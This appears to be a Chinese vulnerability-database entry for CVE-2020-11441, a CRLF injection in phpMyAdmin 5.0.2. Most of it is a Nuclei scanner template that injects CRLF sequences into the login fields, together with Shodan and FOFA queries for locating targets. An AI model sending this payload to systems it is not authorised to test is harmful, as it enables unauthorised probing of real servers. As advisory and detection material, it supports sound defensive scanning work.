CVE-2020-11441: phpMyAdmin 5.0.2 - CRLF Injection

日期: 2025-08-01 | 影响软件: phpMyAdmin | POC: 已公开

漏洞描述

phpMyAdmin 5.0.2 allows CRLF injection, as demonstrated by %0D%0Astring%0D%0A inputs to login form fields causing CRLF sequences to be reflected on an error page. NOTE: the vendor states "I don't see anything specifically exploitable.

PoC代码[已公开]

id: CVE-2020-11441

info:
  name: phpMyAdmin 5.0.2 - CRLF Injection
  author: ritikchaddha
  severity: medium
  description: |
    phpMyAdmin 5.0.2 allows CRLF injection, as demonstrated by %0D%0Astring%0D%0A inputs to login form fields causing CRLF sequences to be reflected on an error page. NOTE: the vendor states "I don't see anything specifically exploitable.
  reference:
    - https://github.com/phpmyadmin/phpmyadmin/issues/16056
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11441
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-11441
    cwe-id: CWE-93
    epss-score: 0.01304
    epss-percentile: 0.79036
    cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:5.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: phpmyadmin
    product: phpmyadmin
    shodan-query: title:"phpmyadmin"
    fofa-query: title="phpmyadmin"
  tags: cve,crlf,phpmyadmin,cve2020

http:
  - raw:
      - |
        GET /index.php?route=/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /index.php?route=/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        set_session={{session}}&pma_username=%0D%0Atest:crlfinjection=1%0D%0A&pma_password=%0D%0Atest:crlfinjection=1%0D%0A&server=1&route=%2F&lang=en&token={{token}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "^test:crlfinjection=1$"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        name: session
        group: 1
        regex:
          - 'name="set_session" value="([a-z0-9]+)"'
        internal: true

      - type: regex
        part: body
        name: token
        group: 1
        regex:
          - 'name="token" value="([a-z0-9]+)"'
        internal: true
# digest: 4b0a00483046022100e760d161e76aa983888a2309d01351710c6e50f1187190840ccdc032c7223b0f022100f24cdbbf2fa555757d96ad1b1edb95d88a9651e0a964c35a7e3a8455c04bfca9:922c64590222798bb761d5b6d8e72950

相关漏洞推荐